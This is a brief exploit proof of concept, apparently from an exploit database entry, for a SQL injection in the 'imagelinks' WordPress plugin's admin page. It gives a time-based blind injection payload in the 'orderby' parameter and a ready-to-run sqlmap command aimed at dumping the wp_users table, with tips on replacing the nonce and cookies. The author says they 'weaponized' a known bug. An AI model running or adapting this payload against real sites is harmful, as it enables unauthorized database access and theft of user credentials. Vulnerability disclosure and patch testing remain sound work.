Note
I do not take credit for finding this, I only simply weaponized it as it was missing technical details on exploitation.
PoC:
page=imagelinks&_wpnonce=13e9be524c&_wp_http_referer=/wp-admin/admin.php?page=imagelinks&action=-1&imagelinks_item[0]=2&action2=-1&orderby=title AND (SELECT 2209 FROM (SELECT(SLEEP(5)))GBjd)&order=asc
SQLMap:
MAKE SURE TO REPLACE THE NONCE AND ADD COOKIES, YOU MAY NEED TO ENUM DATABASES AS WELL AND PIN TO PROPER DATABASE
sqlmap -u 'http://localhost/wp-admin/admin.php?page=imagelinks&_wpnonce=13e9be524c&_wp_http_referer=/wp-admin/admin.php?page=imagelinks&action=-1&imagelinks_item[0]=2&action2=-1&orderby=title&order=asc' -p 'orderby' -D wordpress -T wp_users --cookie='COOKIESHERE'